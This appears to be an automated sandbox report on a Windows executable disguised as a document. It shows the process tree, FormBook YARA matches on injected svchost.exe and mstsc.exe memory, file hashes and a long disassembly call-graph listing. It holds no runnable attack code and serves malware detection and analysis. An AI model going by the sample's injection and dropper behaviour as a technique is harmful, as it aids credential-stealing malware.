                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 34 61 72 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /a4ar/ was not found on this server.</p></body></html>


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:05:17:00
                                                      Start date:11/09/2024
                                                      Path:C:\Users\user\Desktop\DOC092024-0431202229487.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\DOC092024-0431202229487.exe"
                                                      Imagebase:0x710000
                                                      File size:753'664 bytes
                                                      MD5 hash:3A3B2034D8649F6112FAA82E0DABA310
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:1
                                                      Start time:05:17:01
                                                      Start date:11/09/2024
                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\DOC092024-0431202229487.exe"
                                                      Imagebase:0x280000
                                                      File size:46'504 bytes
                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1782440738.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1782440738.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1783144995.0000000003650000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1783144995.0000000003650000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1783204016.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1783204016.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:2
                                                      Start time:05:17:03
                                                      Start date:11/09/2024
                                                      Path:C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe"
                                                      Imagebase:0x470000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4144609194.0000000002590000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4144609194.0000000002590000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:3
                                                      Start time:05:17:05
                                                      Start date:11/09/2024
                                                      Path:C:\Windows\SysWOW64\mstsc.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\mstsc.exe"
                                                      Imagebase:0x460000
                                                      File size:1'264'640 bytes
                                                      MD5 hash:EA4A02BE14C405327EEBA8D9AD2BD42C
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4144779638.0000000004330000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4144779638.0000000004330000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4144729578.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4144729578.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4143200808.0000000002640000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4143200808.0000000002640000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:moderate
                                                      Has exited:false

                                                      General

                                                      Target ID:5
                                                      Start time:05:17:17
                                                      Start date:11/09/2024
                                                      Path:C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\BMiBqafLHjzkobRiuPCIhaDFMyZMzcumuqkxLIIwKxCuVzBYyRmbudyDyFjmM\NZuQxWwOkTbZ.exe"
                                                      Imagebase:0x470000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4147103044.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4147103044.0000000004CD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:8
                                                      Start time:05:17:29
                                                      Start date:11/09/2024
                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0x7ff6bf500000
                                                      File size:676'768 bytes
                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:3.5%
                                                        Dynamic/Decrypted Code Coverage:0.9%
                                                        Signature Coverage:6.6%
                                                        Total number of Nodes:1939
                                                        Total number of Limit Nodes:190
                                                        execution_graph 103142 781eca 103147 72be17 103142->103147 103146 781ed9 103155 71d3d2 103147->103155 103151 72bf22 103152 72bf3e 103151->103152 103163 72c8b7 48 API calls _memmove 103151->103163 103154 731b2a 52 API calls __cinit 103152->103154 103154->103146 103164 73010a 103155->103164 103157 71d3f3 103158 73010a 48 API calls 103157->103158 103159 71d401 103158->103159 103160 72c929 103159->103160 103195 72c955 103160->103195 103163->103151 103166 730112 __calloc_impl 103164->103166 103167 73012c 103166->103167 103168 73012e std::exception::exception 103166->103168 103173 7345ec 103166->103173 103167->103157 103187 737495 RaiseException 103168->103187 103170 730158 103188 7373cb 47 API calls _free 103170->103188 103172 73016a 103172->103157 103174 734667 __calloc_impl 103173->103174 103181 7345f8 __calloc_impl 103173->103181 103194 73889e 47 API calls __getptd_noexit 103174->103194 103177 73462b RtlAllocateHeap 103178 73465f 103177->103178 103177->103181 103178->103166 103180 734653 103192 73889e 47 API calls __getptd_noexit 103180->103192 103181->103177 103181->103180 103182 734603 103181->103182 103185 734651 103181->103185 103182->103181 103189 738e52 47 API calls 2 library calls 103182->103189 103190 738eb2 47 API calls 6 library calls 103182->103190 103191 731d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 103182->103191 103193 73889e 47 API calls __getptd_noexit 103185->103193 103187->103170 103188->103172 103189->103182 103190->103182 103192->103185 103193->103178 103194->103178 103196 72c962 103195->103196 103198 72c948 103195->103198 103197 72c969 RegOpenKeyExW 103196->103197 103196->103198 103197->103198 103199 72c983 RegQueryValueExW 103197->103199 103198->103151 103200 72c9a4 103199->103200 103201 72c9b9 RegCloseKey 103199->103201 103200->103201 103201->103198 103202 781edb 103207 71131c 103202->103207 103204 781ee1 103240 731b2a 52 API calls __cinit 103204->103240 103206 781eeb 103208 71133e 103207->103208 103241 711624 103208->103241 103213 71d3d2 48 API calls 103214 71137e 103213->103214 103215 71d3d2 48 API calls 103214->103215 103216 711388 103215->103216 103217 71d3d2 48 API calls 103216->103217 103218 711392 103217->103218 103219 71d3d2 48 API calls 103218->103219 103220 7113d8 103219->103220 103221 71d3d2 48 API calls 103220->103221 103222 7114bb 103221->103222 103249 711673 103222->103249 103226 7114eb 103227 71d3d2 48 API calls 103226->103227 103228 7114f5 103227->103228 103278 71175e 103228->103278 103230 711540 103231 711550 GetStdHandle 103230->103231 103232 7858da 103231->103232 103233 7115ab 103231->103233 103232->103233 103235 7858e3 103232->103235 103234 7115b1 CoInitialize 103233->103234 103234->103204 103285 759bd1 53 API calls 103235->103285 103237 7858ea 103286 75a2f6 CreateThread 103237->103286 103239 7858f6 CloseHandle 103239->103234 103240->103206 103287 7117e0 103241->103287 103245 711344 103246 7116db 103245->103246 103322 711867 6 API calls 103246->103322 103248 711374 103248->103213 103250 71d3d2 48 API calls 103249->103250 103251 711683 103250->103251 103252 71d3d2 48 API calls 103251->103252 103253 71168b 103252->103253 103323 717d70 103253->103323 103256 717d70 48 API calls 103257 71169b 103256->103257 103258 71d3d2 48 API calls 103257->103258 103259 7116a6 103258->103259 103260 73010a 48 API calls 103259->103260 103261 7114c5 103260->103261 103262 7116f2 103261->103262 103263 711700 103262->103263 103264 71d3d2 48 API calls 103263->103264 103265 71170b 103264->103265 103266 71d3d2 48 API calls 103265->103266 103267 711716 103266->103267 103268 71d3d2 48 API calls 103267->103268 103269 711721 103268->103269 103270 71d3d2 48 API calls 103269->103270 103271 71172c 103270->103271 103272 717d70 48 API calls 103271->103272 103273 711737 103272->103273 103274 73010a 48 API calls 103273->103274 103275 71173e 103274->103275 103276 711747 RegisterClipboardFormatW 103275->103276 103277 7824a6 103275->103277 103276->103226 103279 7867dd 103278->103279 103280 71176e 103278->103280 103328 75d231 50 API calls 103279->103328 103281 73010a 48 API calls 103280->103281 103283 711776 103281->103283 103283->103230 103284 7867e8 103285->103237 103286->103239 103329 75a2dc 54 API calls 103286->103329 103303 7117fc 103287->103303 103290 7117fc 48 API calls 103291 7117f0 103290->103291 103292 71d3d2 48 API calls 103291->103292 103293 71165b 103292->103293 103294 717e53 103293->103294 103295 717ecf 103294->103295 103298 717e5f __NMSG_WRITE 103294->103298 103314 71a2fb 103295->103314 103297 717e85 _memmove 103297->103245 103299 717ec7 103298->103299 103300 717e7b 103298->103300 103313 717eda 48 API calls 103299->103313 103310 71a6f8 103300->103310 103304 71d3d2 48 API calls 103303->103304 103305 711807 103304->103305 103306 71d3d2 48 API calls 103305->103306 103307 71180f 103306->103307 103308 71d3d2 48 API calls 103307->103308 103309 7117e8 103308->103309 103309->103290 103311 73010a 48 API calls 103310->103311 103312 71a702 103311->103312 103312->103297 103313->103297 103315 71a321 _memmove 103314->103315 103316 71a309 103314->103316 103315->103297 103316->103315 103318 71b8a7 103316->103318 103319 71b8ba 103318->103319 103321 71b8b7 _memmove 103318->103321 103320 73010a 48 API calls 103319->103320 103320->103321 103321->103315 103322->103248 103324 71d3d2 48 API calls 103323->103324 103325 717d79 103324->103325 103326 71d3d2 48 API calls 103325->103326 103327 711693 103326->103327 103327->103256 103328->103284 103330 736a80 103331 736a8c __freefls@4 103330->103331 103367 738b7b GetStartupInfoW 103331->103367 103333 736a91 103369 73a937 GetProcessHeap 103333->103369 103335 736ae9 103336 736af4 103335->103336 103454 736bd0 47 API calls 3 library calls 103335->103454 103370 7387d7 103336->103370 103339 736afa 103341 736b05 __RTC_Initialize 103339->103341 103455 736bd0 47 API calls 3 library calls 103339->103455 103391 73ba66 103341->103391 103343 736b14 103344 736b20 GetCommandLineW 103343->103344 103456 736bd0 47 API calls 3 library calls 103343->103456 103410 743c2d GetEnvironmentStringsW 103344->103410 103348 736b1f 103348->103344 103351 736b45 103423 743a64 103351->103423 103354 736b4b 103355 736b56 103354->103355 103458 731d7b 47 API calls 3 library calls 103354->103458 103437 731db5 103355->103437 103358 736b5e 103359 736b69 __wwincmdln 103358->103359 103459 731d7b 47 API calls 3 library calls 103358->103459 103441 713682 103359->103441 103362 736b7d 103363 736b8c 103362->103363 103460 732011 47 API calls _doexit 103362->103460 103461 731da6 47 API calls _doexit 103363->103461 103366 736b91 __freefls@4 103368 738b91 103367->103368 103368->103333 103369->103335 103462 731e5a 30 API calls 2 library calls 103370->103462 103372 7387dc 103463 738ab3 InitializeCriticalSectionAndSpinCount 103372->103463 103374 7387e1 103375 7387e5 103374->103375 103465 738afd TlsAlloc 103374->103465 103464 73884d 50 API calls 2 library calls 103375->103464 103378 7387ea 103378->103339 103379 7387f7 103379->103375 103380 738802 103379->103380 103466 737616 103380->103466 103383 738844 103474 73884d 50 API calls 2 library calls 103383->103474 103386 738849 103386->103339 103387 738823 103387->103383 103388 738829 103387->103388 103473 738724 47 API calls 4 library calls 103388->103473 103390 738831 GetCurrentThreadId 103390->103339 103392 73ba72 __freefls@4 103391->103392 103483 738984 103392->103483 103394 73ba79 103395 737616 __calloc_crt 47 API calls 103394->103395 103396 73ba8a 103395->103396 103397 73baf5 GetStartupInfoW 103396->103397 103399 73ba95 @_EH4_CallFilterFunc@8 __freefls@4 103396->103399 103405 73bc33 103397->103405 103407 73bb0a 103397->103407 103398 73bcf7 103490 73bd0b RtlLeaveCriticalSection _doexit 103398->103490 103399->103343 103401 73bc7c GetStdHandle 103401->103405 103402 737616 __calloc_crt 47 API calls 103402->103407 103403 73bc8e GetFileType 103403->103405 103404 73bb58 103404->103405 103408 73bb8a GetFileType 103404->103408 103409 73bb98 InitializeCriticalSectionAndSpinCount 103404->103409 103405->103398 103405->103401 103405->103403 103406 73bcbb InitializeCriticalSectionAndSpinCount 103405->103406 103406->103405 103407->103402 103407->103404 103407->103405 103408->103404 103408->103409 103409->103404 103411 736b30 103410->103411 103412 743c3e 103410->103412 103417 74382b GetModuleFileNameW 103411->103417 103529 737660 47 API calls _W_store_winword 103412->103529 103415 743c64 _memmove 103416 743c7a FreeEnvironmentStringsW 103415->103416 103416->103411 103418 74385f _wparse_cmdline 103417->103418 103419 736b3a 103418->103419 103420 743899 103418->103420 103419->103351 103457 731d7b 47 API calls 3 library calls 103419->103457 103530 737660 47 API calls _W_store_winword 103420->103530 103422 74389f _wparse_cmdline 103422->103419 103424 743a75 103423->103424 103425 743a7d __NMSG_WRITE 103423->103425 103424->103354 103426 737616 __calloc_crt 47 API calls 103425->103426 103433 743aa6 __NMSG_WRITE 103426->103433 103427 743afd 103428 7328ca _free 47 API calls 103427->103428 103428->103424 103429 737616 __calloc_crt 47 API calls 103429->103433 103430 743b22 103431 7328ca _free 47 API calls 103430->103431 103431->103424 103433->103424 103433->103427 103433->103429 103433->103430 103434 743b39 103433->103434 103531 743317 47 API calls __wmakepath_s 103433->103531 103532 737ab0 IsProcessorFeaturePresent 103434->103532 103436 743b45 103436->103354 103438 731dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 103437->103438 103440 731e00 __IsNonwritableInCurrentImage 103438->103440 103555 731b2a 52 API calls __cinit 103438->103555 103440->103358 103442 7823b5 103441->103442 103443 71369c 103441->103443 103444 7136d6 745EC8D0 103443->103444 103556 732025 103444->103556 103448 713702 103568 7132de SystemParametersInfoW SystemParametersInfoW 103448->103568 103450 71370e 103569 71374e GetCurrentDirectoryW 103450->103569 103453 71373b 103453->103362 103454->103336 103455->103341 103456->103348 103460->103363 103461->103366 103462->103372 103463->103374 103464->103378 103465->103379 103468 73761d 103466->103468 103469 73765a 103468->103469 103470 73763b Sleep 103468->103470 103475 743e5a 103468->103475 103469->103383 103472 738b59 TlsSetValue 103469->103472 103471 737652 103470->103471 103471->103468 103471->103469 103472->103387 103473->103390 103474->103386 103476 743e65 103475->103476 103477 743e80 __calloc_impl 103475->103477 103476->103477 103478 743e71 103476->103478 103479 743e90 RtlAllocateHeap 103477->103479 103481 743e76 103477->103481 103482 73889e 47 API calls __getptd_noexit 103478->103482 103479->103477 103479->103481 103481->103468 103482->103481 103484 738995 103483->103484 103485 7389a8 RtlEnterCriticalSection 103483->103485 103491 738a0c 103484->103491 103485->103394 103487 73899b 103487->103485 103515 731d7b 47 API calls 3 library calls 103487->103515 103490->103399 103492 738a18 __freefls@4 103491->103492 103493 738a21 103492->103493 103494 738a39 103492->103494 103516 738e52 47 API calls 2 library calls 103493->103516 103497 738aa1 __freefls@4 103494->103497 103509 738a37 103494->103509 103496 738a26 103517 738eb2 47 API calls 6 library calls 103496->103517 103497->103487 103500 738a4d 103502 738a63 103500->103502 103503 738a54 103500->103503 103501 738a2d 103518 731d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 103501->103518 103504 738984 __lock 46 API calls 103502->103504 103520 73889e 47 API calls __getptd_noexit 103503->103520 103508 738a6a 103504->103508 103507 738a59 103507->103497 103510 738a79 InitializeCriticalSectionAndSpinCount 103508->103510 103511 738a8e 103508->103511 103509->103494 103519 737660 47 API calls _W_store_winword 103509->103519 103512 738a94 103510->103512 103521 7328ca 103511->103521 103527 738aaa RtlLeaveCriticalSection _doexit 103512->103527 103516->103496 103517->103501 103519->103500 103520->103507 103522 7328d3 RtlFreeHeap 103521->103522 103526 7328fc __dosmaperr 103521->103526 103523 7328e8 103522->103523 103522->103526 103528 73889e 47 API calls __getptd_noexit 103523->103528 103525 7328ee GetLastError 103525->103526 103526->103512 103527->103497 103528->103525 103529->103415 103530->103422 103531->103433 103533 737abb 103532->103533 103538 737945 103533->103538 103537 737ad6 103537->103436 103539 73795f _memset __call_reportfault 103538->103539 103540 73797f IsDebuggerPresent 103539->103540 103546 738e3c SetUnhandledExceptionFilter UnhandledExceptionFilter 103540->103546 103543 737a43 __call_reportfault 103547 73b4bf 103543->103547 103544 737a66 103545 738e27 GetCurrentProcess TerminateProcess 103544->103545 103545->103537 103546->103543 103548 73b4c7 103547->103548 103549 73b4c9 IsProcessorFeaturePresent 103547->103549 103548->103544 103551 744560 103549->103551 103554 74450f 5 API calls 2 library calls 103551->103554 103553 744643 103553->103544 103554->103553 103555->103440 103557 738984 __lock 47 API calls 103556->103557 103558 732030 103557->103558 103614 738ae8 RtlLeaveCriticalSection 103558->103614 103560 7136fb 103561 73208d 103560->103561 103562 7320b1 103561->103562 103563 732097 103561->103563 103562->103448 103563->103562 103615 73889e 47 API calls __getptd_noexit 103563->103615 103565 7320a1 103616 737aa0 8 API calls __wmakepath_s 103565->103616 103567 7320ac 103567->103448 103568->103450 103617 714257 103569->103617 103571 71377f IsDebuggerPresent 103572 71378d 103571->103572 103573 7821b7 MessageBoxA 103571->103573 103574 713852 103572->103574 103576 7821d0 103572->103576 103577 7137aa 103572->103577 103573->103576 103575 713859 SetCurrentDirectoryW 103574->103575 103578 713716 SystemParametersInfoW 103575->103578 103786 752f5b 48 API calls 103576->103786 103681 713bff 103577->103681 103578->103453 103582 7137c8 GetFullPathNameW 103691 7134f3 103582->103691 103583 7821e0 103587 7821f6 SetCurrentDirectoryW 103583->103587 103586 71380f 103588 713818 103586->103588 103787 74be31 AllocateAndInitializeSid CheckTokenMembership FreeSid 103586->103787 103587->103578 103706 7130a5 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 103588->103706 103592 782213 103592->103588 103594 782224 GetModuleFileNameW 103592->103594 103788 71caee 103594->103788 103595 713822 103597 713837 103595->103597 103714 713598 103595->103714 103724 71e1f0 103597->103724 103601 78224c 103792 7139e8 48 API calls 2 library calls 103601->103792 103602 782271 103795 7139e8 48 API calls 2 library calls 103602->103795 103606 782257 103793 7139e8 48 API calls 2 library calls 103606->103793 103607 78226d GetForegroundWindow ShellExecuteW 103612 7822a5 Mailbox 103607->103612 103611 782264 103794 7139e8 48 API calls 2 library calls 103611->103794 103612->103574 103614->103560 103615->103565 103616->103567 103796 713c70 103617->103796 103621 714278 GetModuleFileNameW 103813 7134c1 103621->103813 103626 71caee 48 API calls 103627 7142ba 103626->103627 103828 71d380 103627->103828 103629 7142ca Mailbox 103630 71caee 48 API calls 103629->103630 103631 7142f2 103630->103631 103632 71d380 55 API calls 103631->103632 103633 714305 Mailbox 103632->103633 103634 71caee 48 API calls 103633->103634 103635 714316 103634->103635 103832 71d2d2 103635->103832 103637 714328 Mailbox 103638 71d3d2 48 API calls 103637->103638 103639 71433b 103638->103639 103838 714477 103639->103838 103643 714355 103644 71435f 103643->103644 103645 7820f7 103643->103645 103646 731bc7 _W_store_winword 59 API calls 103644->103646 103647 714477 48 API calls 103645->103647 103648 71436a 103646->103648 103649 78210b 103647->103649 103648->103649 103650 714374 103648->103650 103651 714477 48 API calls 103649->103651 103652 731bc7 _W_store_winword 59 API calls 103650->103652 103653 782127 103651->103653 103654 71437f 103652->103654 103655 78212f GetModuleFileNameW 103653->103655 103654->103655 103656 714389 103654->103656 103657 714477 48 API calls 103655->103657 103658 731bc7 _W_store_winword 59 API calls 103656->103658 103659 782160 103657->103659 103660 714394 103658->103660 103882 71c935 48 API calls 103659->103882 103662 7143d6 103660->103662 103664 782185 _wcscpy 103660->103664 103667 714477 48 API calls 103660->103667 103663 7143e7 103662->103663 103662->103664 103854 713320 103663->103854 103671 714477 48 API calls 103664->103671 103665 78216e 103666 714477 48 API calls 103665->103666 103669 78217d 103666->103669 103670 7143b8 _wcscpy 103667->103670 103669->103664 103675 714477 48 API calls 103670->103675 103673 7821ab 103671->103673 103672 7143ff 103865 7214a0 103672->103865 103673->103673 103675->103662 103676 7214a0 48 API calls 103678 71440f 103676->103678 103678->103676 103679 714477 48 API calls 103678->103679 103680 714451 Mailbox 103678->103680 103881 717bef 48 API calls 103678->103881 103679->103678 103680->103571 103682 713c1f _memset 103681->103682 103688 7137c0 103682->103688 104516 7131b8 103682->104516 103684 713c28 104523 713a67 SHGetMalloc 103684->104523 103686 713c31 104528 713b45 GetFullPathNameW 103686->104528 103688->103574 103688->103582 104611 71a716 103691->104611 103693 713575 103693->103583 103693->103586 103694 713501 103694->103693 104622 7121dd 86 API calls 103694->104622 103696 71350a 103696->103693 104623 715460 88 API calls Mailbox 103696->104623 103698 713513 103698->103693 103699 713517 GetFullPathNameW 103698->103699 103700 717e53 48 API calls 103699->103700 103701 713541 103700->103701 103702 717e53 48 API calls 103701->103702 103703 71354e 103702->103703 103704 7866b4 _wcscat 103703->103704 103705 717e53 48 API calls 103703->103705 103705->103693 103707 7821b0 103706->103707 103708 71310f 103706->103708 104626 71318a 103708->104626 103713 712e9d CreateWindowExW CreateWindowExW ShowWindow ShowWindow 103713->103595 103715 7135c3 _memset 103714->103715 104634 7138c4 103715->104634 103718 713648 103720 713666 Shell_NotifyIconW 103718->103720 103721 7845c2 Shell_NotifyIconW 103718->103721 104638 7138e4 103720->104638 103723 71367b 103723->103597 103725 71e216 103724->103725 103746 71e226 Mailbox 103724->103746 103726 71e670 103725->103726 103725->103746 104748 72ecee 378 API calls 103726->104748 103727 71e4e7 103729 713842 103727->103729 104749 71322e 16 API calls 103727->104749 103729->103574 103785 712b94 Shell_NotifyIconW _memset 103729->103785 103731 71e681 103731->103729 103732 71e68e 103731->103732 104750 72ec33 378 API calls Mailbox 103732->104750 103733 71e26c PeekMessageW 103733->103746 103735 785b13 Sleep 103735->103746 103736 71e695 LockWindowUpdate DestroyWindow GetMessageW 103736->103729 103738 71e6c7 103736->103738 103739 7862a7 TranslateMessage DispatchMessageW GetMessageW 103738->103739 103739->103739 103742 7862d7 103739->103742 103741 72cf79 49 API calls 103741->103746 103742->103729 103743 71e657 PeekMessageW 103743->103746 103744 71e517 timeGetTime 103744->103746 103746->103727 103746->103733 103746->103735 103746->103741 103746->103743 103746->103744 103748 73010a 48 API calls 103746->103748 103749 785dfc WaitForSingleObject 103746->103749 103750 71e641 TranslateMessage DispatchMessageW 103746->103750 103751 786147 Sleep 103746->103751 103754 711000 354 API calls 103746->103754 103755 785cce Mailbox 103746->103755 103756 71e6cc timeGetTime 103746->103756 103757 785feb Sleep 103746->103757 103766 785cea Sleep 103746->103766 103782 71d380 55 API calls 103746->103782 103783 75d520 86 API calls 103746->103783 103784 71caee 48 API calls 103746->103784 104670 71e7e0 103746->104670 104677 71ea00 103746->104677 104727 7244e0 103746->104727 104744 71e7b0 378 API calls Mailbox 103746->104744 104745 723680 378 API calls 2 library calls 103746->104745 104746 72f381 TranslateAcceleratorW 103746->104746 104747 72ed1a IsDialogMessageW GetClassLongW 103746->104747 104752 71c935 48 API calls 103746->104752 104753 778b20 48 API calls 103746->104753 104757 71fa40 103746->104757 103748->103746 103749->103746 103752 785e19 GetExitCodeProcess CloseHandle 103749->103752 103750->103743 103751->103755 103752->103746 103753 71d3d2 48 API calls 103753->103755 103754->103746 103755->103746 103755->103753 103761 7861de GetExitCodeProcess 103755->103761 103763 72e3a5 timeGetTime 103755->103763 103755->103766 103767 785cd7 Sleep 103755->103767 103768 778a48 108 API calls 103755->103768 103769 711dce 107 API calls 103755->103769 103771 786266 Sleep 103755->103771 103772 71caee 48 API calls 103755->103772 103776 71d380 55 API calls 103755->103776 104754 7556dc 49 API calls Mailbox 103755->104754 104755 72cf79 49 API calls 103755->104755 104756 711000 378 API calls 103755->104756 104797 76d12a 50 API calls 103755->104797 104798 758355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 103755->104798 104799 756f5b 63 API calls 3 library calls 103755->104799 104751 72cf79 49 API calls 103756->104751 103757->103755 103764 78620a CloseHandle 103761->103764 103765 7861f4 WaitForSingleObject 103761->103765 103763->103755 103764->103755 103765->103746 103765->103764 103766->103746 103767->103766 103768->103755 103769->103755 103771->103746 103772->103755 103776->103755 103782->103746 103783->103746 103784->103746 103785->103574 103786->103583 103787->103592 103789 71cafd __NMSG_WRITE _memmove 103788->103789 103790 73010a 48 API calls 103789->103790 103791 71cb3b 103790->103791 103791->103601 103791->103602 103792->103606 103793->103611 103794->103607 103795->103607 103797 71d3d2 48 API calls 103796->103797 103798 713c80 103797->103798 103799 71a359 103798->103799 103800 71a366 __ftell_nolock 103799->103800 103801 71a4cc Mailbox 103800->103801 103802 717e53 48 API calls 103800->103802 103801->103621 103804 71a398 103802->103804 103812 71a3ce Mailbox 103804->103812 103883 71a4f6 103804->103883 103805 71a4f6 48 API calls 103805->103812 103806 71a49f 103806->103801 103807 71caee 48 API calls 103806->103807 103809 71a4c0 103807->103809 103808 71caee 48 API calls 103808->103812 103887 715b47 48 API calls _memmove 103809->103887 103812->103801 103812->103805 103812->103806 103812->103808 103886 715b47 48 API calls _memmove 103812->103886 103888 713f9b 103813->103888 103816 7134ea 103825 718182 103816->103825 103819 7328ca _free 47 API calls 103821 7834d0 103819->103821 103823 713e39 84 API calls 103821->103823 103822 7834c3 103822->103819 103824 7834d9 103823->103824 103824->103824 103826 73010a 48 API calls 103825->103826 103827 7142ad 103826->103827 103827->103626 103829 71d38b 103828->103829 103830 71d3b4 103829->103830 104505 71d772 55 API calls 103829->104505 103830->103629 103833 71d30a 103832->103833 103834 71d2df 103832->103834 103833->103637 103837 71d2e6 103834->103837 104507 71d349 53 API calls 103834->104507 103837->103833 104506 71d349 53 API calls 103837->104506 103839 714481 103838->103839 103840 71449a 103838->103840 104508 71c935 48 API calls 103839->104508 103842 717e53 48 API calls 103840->103842 103843 714347 103842->103843 103844 731bc7 103843->103844 103845 731bd3 103844->103845 103846 731c48 103844->103846 103853 731bf8 103845->103853 104509 73889e 47 API calls __getptd_noexit 103845->104509 104511 731c5a 59 API calls 3 library calls 103846->104511 103849 731c55 103849->103643 103850 731bdf 104510 737aa0 8 API calls __wmakepath_s 103850->104510 103852 731bea 103852->103643 103853->103643 